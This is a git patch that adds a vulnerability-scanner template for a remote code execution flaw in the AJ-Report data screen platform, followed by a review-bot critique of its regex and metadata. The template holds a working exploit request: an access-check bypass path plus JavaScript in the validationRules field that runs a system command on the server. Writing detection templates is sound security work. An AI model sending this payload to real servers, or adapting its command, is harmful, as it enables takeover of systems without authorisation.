From 623c041231ee7c97d48f9e64fe81781e22568903 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 18:31:42 +0530
Subject: [PATCH] Create aj-report-rce.yaml
---
 http/vulnerabilities/other/aj-report-rce.yaml | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/vulnerabilities/other/aj-report-rce.yaml
diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml
new file mode 100644
index 00000000000..00fc980bbb2
--- /dev/null
+++ b/http/vulnerabilities/other/aj-report-rce.yaml
@@ -0,0 +1,42 @@
+id: aj-report-rce
+
+info:
+ name: AJ-Report Open Source Data Screen - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
+ reference:
+ - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ fofa-query: title="AJ-Report"
+ tags: aj-report,rce
+
+http:
+ - raw:
+ - |
+ POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Content-Type: application/json;charset=UTF-8
+
+ {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "code"
+ - "data"
+ condition: and
+
+ - type: regex
+ part: body
+ regex:
+ - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+
+ - type: status
+ status:
+ - 200
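Review bot: The regex matcher `"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"` places literal parentheses inside the character classes, so `[0-9(a-z)]` also accepts `(` and `)` and the capture groups the author appears to intend are not what is written; `- "uid=([0-9a-z]+) gid=([0-9a-z]+)"` expresses the same check without that slip. Since the `words` matcher on `code` and `data` alone would match many unrelated JSON responses, this regex is the matcher that actually carries the detection, so its precision matters for avoiding false positives. The `metadata` block gives only a `fofa-query`; templates in this repository conventionally also carry `max-request: 1` for a single-request check, and `severity: high` for an RCE finding is worth reconciling with the repository's severity guidance. The `description` reads as a machine translation; a one-sentence rewording stating the checked condition, such as `The validationRules parameter accepted by /dataSetParam/verification appears to be evaluated server-side, allowing remote code execution.`, would be clearer for triage.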